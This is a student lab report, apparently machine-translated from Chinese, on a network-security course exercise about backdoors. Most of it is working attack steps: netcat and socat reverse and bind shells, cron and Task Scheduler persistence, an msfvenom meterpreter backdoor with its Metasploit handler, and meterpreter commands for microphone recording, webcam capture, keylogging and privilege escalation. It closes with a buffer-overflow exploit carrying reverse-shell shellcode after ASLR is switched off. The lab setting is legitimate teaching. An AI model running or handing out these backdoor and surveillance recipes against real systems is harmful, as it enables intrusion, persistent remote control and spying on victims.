table of Contents
- 2019-2020-2 20175216 "network technology against" back door Principles and Practice Exp2
- Experimental preparation
- experiment procedure
- 1, using netcat get the host operating Shell, cron start
- 2, socat get the host operating Shell, plans to start the task
- 4, using MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
- Points: Using the shellcode MSF generation, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
- Experimental summary
2019-2020-2 20175216 "network technology against" back door Principles and Practice Exp2
Experimental preparation
1, netcat
learning
netcat
It is a bottom tool, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.Linux in general comes
ncat
, you can useman netcat
orman nc
view its instructionswindows get the linux shell
- Used under Windows
ipconfig
to see the local IP as192.168.2.130
In Windows use
ncat.exe
listens native5216
portncat.exe -l -p 5216
In linux rebound connect Windows,
nc 192.168.2.130 5216 -e /bin/sh
, using the-e
option to performshell
procedures
Windows successfully obtained a shell linux
linux get winsdows of shell
- Check use under Linux
ip addr
IP address192.168.170.142
In use linux end
nc -l -p 5216
instruction listening5216
port
Under Windows, use
ncat.exe -e cmd.exe 192.168.170.142 5216
instruction of the reverse connection linux host5216
port
linux successfully see the Windows command prompt, use the
dir
ViewD:\20175216zxy\ncat
Files directory
Transmitting data using nc
Use the Windows
ncat.exe -l 5216
command monitor port 5216linux using
nc 192.168.2.130 5216
command rebound connect to a Windows port of 5215
nc transfer files
linux Windows to transfer files
- Windows by
ncat.exe -l 5216> 20175216.txt
listening 5216 port- linux rebound connection port Windows 5216
nc 192.168.2.130 5216 < zxy.txt
, Windows can receive files sent by linux
Windows sends the file to the linux
- kali by
nc -l -p 5216 > 20175216.txt
listening 5216 port- Windows rebound in connection linux port of 5216
ncat.exe 192.168.170.142 5216 < zxy.txt
, linux can receive a document sent by Windows
2, socat learning
- socat ncat is an enhanced version of the format it uses
socat [options] <address> <address>
, two of which address is mandatory, and the options are optional. - Socat basic function is to create two bidirectional byte stream data is transmitted therebetween, the parameter is the address of which represents a new direction. The so-called flow represents the flow of data, and the data can have many different types, the command requires a number of options for correspondingly various types defined and described data flow.
experiment procedure
1, using netcat get the host operating Shell, cron start
- windows use the
ncat.exe -l -p 5216
monitor port 5216
Cron is timed tasks under Linux, every minute running time, preset instruction is executed according to the configuration file. Details can be man cron
.
crontab
Increasing a timed task instructions,-e
expressed editing. In the last line add45 * * * * /bin/netcat 192.168.2.130 5216 -e /bin/sh
the first 45 minutes of each period of reverse connection Windows 5216 host port
- Time to 10:45, this time has gained Kali's shell, use ls to view directories
2, socat get the host operating Shell, plans to start the task
- Right-windows, found the computer management, found in the System Tools Task Scheduler, create a task
常规
Fill in a name for the taskexp
, click on触发器
then新建触发器
, I have chosen工作站锁定时
and then click OK.
In
操作
the import path socat.exe after you unpack the downloaded in the添加参数
filltcp-listen:5216 exec:cmd.exe,pty,stderr
(tocmd.exe
bind to port 5216, the same timecmd.exe
isstderr
redirected tostdout
a) create finished, click OK.
To lock the computer and then re-enter the computer
socat
starts
Kali entered in
socat - tcp:192.168.2.130:5216
(-
on behalf of the standard input and output, the second stream to port Windows 5216 host, IP for the windows of the IP), successfully cmd shell
3, using MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and the host operating acquired Shell
- In the input command kali
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f exe > 20175216_backdoor.exe
(IP as the kali IP) generates backdoor20175216_backdoor.exe
- In Windows, use the
ncat.exe -lv 5216 > 20175216_backdoor.exe
View connection status
In kali input nc 192.168.2.130 5216 <20175216_backdoor.exe (IP for Windows here IP) generated backdoor program to the Windows host, transmission success.
- In linux opening up another terminal,
msfconsole
enter console - Input
use exploit/multi/handler
use monitoring module, set the payload - When used and generated backdoor same payload:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.170.142
Kali here the IP (and specified when generating backdoor same IP)- Port number is the same:
set LPORT 5216
- After the setup is complete,
exploit
start listening
- kali get connected to a Windows host, and got shell on the remote control
4, using MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
- Interception Audio:
record_mic
- Get a camera to take pictures:
webcam_snap
- Screenshots:
screenshot
- Keystroke recording process:
keyscan_start
read keystrokes record:keyscan_dump
- View the current user:
getuid
extracting permissions:getsystem
Points: Using the shellcode MSF generation, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
- Reference sister blog , click shellcode , download directly generate good shellcode
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80
- Close address randomization
execstack -s 20175216pwn //设置堆栈可执行
execstack -q 20175216pwn //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space //查看地址随机化的状态
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
- With a test, enable gdb debugging process,
attach 2087
to establish a connection with the process - Input command
disassemble foo
tofoo
function disassembly. - Then set breakpoints, view inject
buf
memory address. Instructions:break *0x080484ae
- Then back to the beginning of the manual terminal Enter it, and then back to the terminal debugging, enter the command
c
continues. - Next the input command
info r esp
to view Location stack pointer is located, and to change the address stored in the data view - It found that
\x4\x3\x2\x1
there really top of the stack, is the return address of the location.shellcode
Right next door, so the address is0xffffd31c+4=0xffffd320
- The rebound in connection Shellcode into the generated file shellcodeinput
perl -e 'print "A" x 32;print"\x20\xd3\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > shellcodeinput
- Start a new terminal b,
msfconsole
use exploit/multi/handler //用于设置payload
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1 //设置IP为回环地址
set LPORT 4444 //根据代码设置端口
exploit //设置完成开始监听
- Another terminal (cat shellcodeinput; cat) | ./20175216pwn, successful shell
Experimental summary
Problems encountered during the experiment
- Run the backdoor file in Windows
20175216_backdoor.exe
after, but not receiving kali connection
- Solution: IP address, port number, no problems, firewall, anti-virus software have been shut down, restart the virtual machine does not work, restart the computer it last line. Really, ninety percent of the restart can solve the problem, the problem is to reinstall the system remaining ten percent of it.
Basic questions answered
- Example you can think of possible ways to enter a backdoor on your system?
In the web version of the software to download the installation package, download pirated software, their phones because no electrical connection to charge someone else's computer
- How do you know that exemplified the back door to start up (win and linux) way?
linux linux opens a backdoor by modifying the cron program and inject the shellcode
Windows startup by Trojan backdoor
- Which gives you a deep mapping function Meterpreter there?
Be screenshots of the back door, turned on the camera, audio access to information
- How to find yourself the system has not been installed back door?
Open windows defender, view the registry information, antivirus software antivirus
Experimental Experience
Through this experiment, I learned a lot about the back door, I think the phone battery died last November, charging a seniors computer, and then my phone message he saw through the remote control, and thanks to the seniors knowledge, or information flowing into the wrong hands, the consequences could be disastrous. Blacksmith need its own hardware, in the experiment, we have just learned backdoor tip of the iceberg, the future only through continuous learning and thinking, improve their safety awareness in order to reduce the risk of attack.